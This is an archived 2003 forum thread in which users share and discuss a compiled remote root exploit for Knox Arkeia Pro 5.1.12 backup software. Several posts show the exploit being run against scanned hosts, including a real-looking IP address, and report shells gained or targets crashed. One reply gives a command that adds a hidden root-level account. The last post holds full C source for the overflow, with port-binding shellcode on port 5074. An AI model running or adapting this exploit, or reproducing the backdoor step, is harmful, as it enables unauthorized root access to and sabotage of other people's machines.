Knox Arkeia Pro V5.1.12 Backup Remote Root Exploit

Full Version: Knox Arkeia Pro V5.1.12 Backup Remote Root Exploit

GovernmentSecurity.org > The Archives > Public Downloads

Xenos

Sep 20 2003, 05:52 PM

Ok guys here comes a new compiled exploit under Cygwin.
You'll have the detail of the script in the exploit research section

Have fun

haxormse

Sep 20 2003, 05:59 PM

thx i gonna try this

Tomi

Sep 20 2003, 06:28 PM

how to scan at / on the Eploit : Knox_Arkeia_Pro_v5.1.12_backup_Remote_Root_Exploit bug

CybA

Sep 20 2003, 06:29 PM

thx man

greez CybA

Masta

Sep 20 2003, 07:09 PM

scan port: 617

Certox

Sep 20 2003, 07:14 PM

What are u using to scan this?

SeNe

Sep 20 2003, 07:17 PM

Thanks m8, gonna test it..!

Certox

Sep 20 2003, 07:35 PM

Guessing this inst compiled for windows...?

GSecur

Sep 20 2003, 07:40 PM

Yes it is

Certox

Sep 20 2003, 07:59 PM

D:\>knox
Usage:
./à_" hostname target_num
Target 1: Redhat 8.0
Target 2: Redhat 7.2

D:\>./à_" xx.xx.xx.xx 1
'.' is not recognized as an internal or external command,
operable program or batch file.

Certox

Sep 20 2003, 08:04 PM

ok... nm, SEE WHAT RUM DOES TO U!

D:\>knox xx.xx.xx.x 2
[!] connect: Resolver error 0 (no error)

So now... dropping shell.... ne ideas

maZer`-

Sep 21 2003, 12:24 AM

Big thx Xenos!
Start coding a scanner *smile*

shorto85

Sep 21 2003, 06:27 AM

Nice job on the exploit. Cant wait for Mazers scanner

maZer`-

Sep 21 2003, 06:40 AM

Yeah one problem!

Searched Informations this night!
Doesnt get anything! I dont know witch port and all....

If anyone have the source, please post it

EDIT: I found it sorry!

Basti

Sep 21 2003, 10:28 AM

i scanned for port 617, than wrote a autohacker batch and tried it.. there were some results like that, but there wasn t a shell, couldn do anythin

CODE

F:\scannen\Knox>knox 212.87.42.237 1
[*] Connected to 212.87.42.237:617
[*] Connected to 212.87.42.237:617
[*] Sending nops+shellcode
[*] Done, sleeping
[*] Sending overflow
[*] Done
[*] Sleeping and connecting remote shell
[*] Connected to 212.87.42.237:5074
[*] Success, enjoy

anyone an idea why i don t see a shell like c:\winnt\system32\> ??

ivb

Sep 21 2003, 02:35 PM

thnx for the compiled exploit mate, tried it on few results i had in scan..

No luck till know, but saw in reply that it seems to work nicely.

But strange thing is that the 2 results i had from scan, after running the exploit, they completely down, no ping reply or nothing

-=[MePhIsTo]=-

Sep 21 2003, 02:42 PM

QUOTE (Basti @ Sep 21 2003, 10:28 AM)

anyone an idea why i don t see a shell like c:\winnt\system32\> ??

muahahahahaha

Red Hat Linux!!!!!!!!!!!

maZer`-

Sep 21 2003, 03:40 PM

Cant code a scanner! :/
Need a Vulnerable IP to code a scanner!

and i hadnt got any luck with it!

axl

Sep 21 2003, 03:55 PM

lol dude!

its nut a widows bug!!!

but i have a difrennt question:does some know about a good linux ftp server that is easy to install remotely ?

maZer`-

Sep 21 2003, 06:31 PM

Im using proftpd

Mauz

Sep 21 2003, 08:27 PM

[root@LINUXBAK root]# ./temp xxx.xxx.xxx.xxx 1
[*] Connected to xxx.xxx.xxx.xxx:617
[*] Connected to xxx.xxx.xxx.xxx:617
[*] Sending nops+shellcode
[*] Done, sleeping
[*] Sending overflow
[*] Done
[*] Sleeping and connecting remote shell
[!] connect: Resolver Error 0 (no error)
[root@LINUXBAK root]# ./temp xxx.xxx.xxx.xxx 2
[!] connect: Resolver Error 0 (no error)
[root@LINUXBAK root]#

Strange sploit guys, i havent found a vulnerable box yet

Any guys also same probs as me described above?

GreetZ MauZ

QuadMedic

Sep 22 2003, 11:16 AM

lets try this one out,it's seems ok

elBartalo

Sep 22 2003, 08:12 PM

D:\>knox XXX.xxx.XXX.XXX1
[*] Connected to XXX.xxx.XXX.XXX1:617
[*] Connected to XXX.xxx.XXX.XXX1:617
[*] Sending nops+shellcode
[*] Done, sleeping
[*] Sending overflow
[*] Done
[*] Sleeping and connecting remote shell
[*] Connected to XXX.xxx.XXX.XXX1:5074
[*] Success, enjoy
SSH-1.99-OpenSSH_3.4p1 Debian_krb5 3.4p1-0woody3

Yeah i have a shell and now?
Whats the commands on unix to list the disk?

Basti

Sep 23 2003, 06:31 AM

im interested in rehat commands , too , plz tell us noobs

elBartalo

Sep 23 2003, 09:48 AM

no basti i know the commands.... pwd, ls, ect
but i need the commands to upload a ftp server that i´m understand "to list the disk" u know

tenka

Sep 23 2003, 11:59 PM

cd /usr/sbin
./useradd -u 0 -o -p gub nub

][no0b][

Sep 24 2003, 05:31 AM

lnx source :

CODE

/*
* Knox Arkiea arkiead local/remote root exploit.
*
* Portbind 5074 shellcode
*
* Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable.
*
* NULLs out least significant byte of EBP to pull EIP out of overflow buffer.
* A previous request forces a large allocation of NOP's + shellcode in heap
* memory. Find additional targets by searching the heap for NOP's after a
* crash. safeaddr must point to any area of memory that is read/writable
* and won't mess with program/shellcode flow.
*
* ./ark_sink host targetnum
* [user@host dir]$ ./ark_sink 192.168.1.2 1
* [*] Connected to 192.168.1.2:617
* [*] Connected to 192.168.1.2:617
* [*] Sending nops+shellcode
* [*] Done, sleeping
* [*] Sending overflow
* [*] Done
* [*] Sleeping and connecting remote shell
* [*] Connected to 192.168.1.2:5074
* [*] Success, enjoy
* id
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
*
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/nameser.h>

#define BUFLEN 10000 /* for getshell() */
#define LEN 280 /* overflow packet data section */
#define HEAD_LEN 8 /* overflow packet header */
#define NOP_LEN 10000 /* nop+shellcode packet */
#define ARK_PORT 617
#define SHELL_PORT 5074
#define NOP 0x90
#define NUMTARGS 2

struct {
char *os;
unsigned int targret;
unsigned int targsafe;
} targets[] = {
{ "Redhat 8.0", 0x80ecf90, 0x080eb940 },
{ "Redhat 7.2", 0x80eddc0, 0x080eb940 },
NULL
};

/* portbind 5074 */
const char shellcode[] =
"\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08"
"\x8d\x4d\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14"
"\x66\xc7\x45\x16\x13\xd2\x31\xd2\x89\x55\x18\x8d\x55\x14"
"\x89\x55\x0c\xc6\x45\x10\x10\xb0\x66\xcd\x80\x40\x89\x45\x0c"
"\x43\x43\xb0\x66\xcd\x80\x43\x89\x45\x0c\x89\x45\x10\xb0\x66"
"\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41\x80\xf9\x03"
"\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
"\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

unsigned int resolve(char *hostname)
{
u_long ip = 0;
struct hostent *hoste;

if ((int)(ip = inet_addr(hostname)) == -1)
{
if ((hoste = gethostbyname(hostname)) == NULL)
{
herror("[!] gethostbyname");
exit(-1);
}
memcpy(&ip, hoste->h_addr, hoste->h_length);
}
return(ip);
}

int isock(char *hostname, int portnum)
{
struct sockaddr_in sock_a;
int num, sock;
unsigned int ip;
fd_set input;

sock_a.sin_family = AF_INET;
sock_a.sin_port = htons(portnum);
sock_a.sin_addr.s_addr = resolve(hostname);

if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
herror("[!] accept");
exit(-1);
}

if (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)))
{
herror("[!] connect");
exit(-1);
}

fprintf(stderr, "[*] Connected to %s:%d\n", hostname, portnum);
return(sock);

}

int getshell(int sock)
{

char buf[BUFLEN];
int nread=0;

while(1)
{
fd_set input;
FD_SET(0,&input);
FD_SET(sock,&input);
select(sock+1,&input,NULL,NULL,NULL);

if(FD_ISSET(sock,&input))
{
nread=read(sock,buf,BUFLEN);
write(1,buf,nread);
}
if(FD_ISSET(0,&input))
write(sock,buf,read(0,buf,BUFLEN));
}
}

int usage(char *progname)
{
int i;

fprintf(stderr, "Usage:\n./%s hostname target_num\n");
for (i = 0; targets[i].os; i++)
fprintf(stderr, "Target %d: %s\n", i+1, targets[i].os);
exit(-1);
}

int main( int argc, char **argv)
{

/* first 2 bytes are a type 74 request */
/* last two bytes length */
char head[] = "\x00\x4a\x00\x03\x00\x01\xff\xff";
char data[512];
char sc_req[20000];
char *host;
unsigned int tnum;
unsigned int safeaddr;
unsigned int ret;
int datalen = LEN;
int port = ARK_PORT;
unsigned int addr = 0;
int sock_overflow, sock_nops, sock_shell;
int i;

if (argc == 3)
{
host = argv[1];
tnum = atoi(argv[2]);
if (tnum > NUMTARGS || tnum == 0)
{
fprintf(stderr, "[!] Invalid target\n");
usage(argv[0]);
}
}
else
{
usage(argv[0]);
}

tnum--;
ret = targets[tnum].targret;
safeaddr = targets[tnum].targsafe;

sock_overflow = sock_nops = sock_shell = 0;
sock_nops = isock(host, port);
sock_overflow = isock(host, port);

// build data section of overflow packet
memset(data, 0x90, datalen);
for (i = 0; i < datalen; i += 4)
memcpy(data+i, (char *)&ret, 4);
// we overwrite a pointer that must be a valid address
memcpy(data+datalen-12, (char *)&safeaddr, 4);

// build header of overflow packet
datalen = ntohs(datalen);
memcpy(head+6, (char *)&datalen, 2);

// build invalid packet with nops+shellcode
memset(sc_req, 0x90, NOP_LEN+1);
memcpy(sc_req+NOP_LEN, shellcode, sizeof(shellcode));

// send invalid nop+shellcode packet
fprintf(stderr, "[*] Sending nops+shellcode\n");
write(sock_nops, sc_req, NOP_LEN+sizeof(shellcode));
fprintf(stderr, "[*] Done, sleeping\n");
sleep(1);
close(sock_nops);

// send overflow
fprintf(stderr, "[*] Sending overflow\n");
write(sock_overflow, head, HEAD_LEN);
write(sock_overflow, data, LEN);
fprintf(stderr, "[*] Done\n");
fprintf(stderr, "[*] Sleeping and connecting remote shell\n");
sleep (1);
close(sock_overflow);

// connect to shell
sock_shell = isock(host, SHELL_PORT);
fprintf(stderr, "[*] Success, enjoy\n");
getshell(sock_shell);

}

but a scann to diff. between rh8 & rh7.2 would be fine
greetz

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.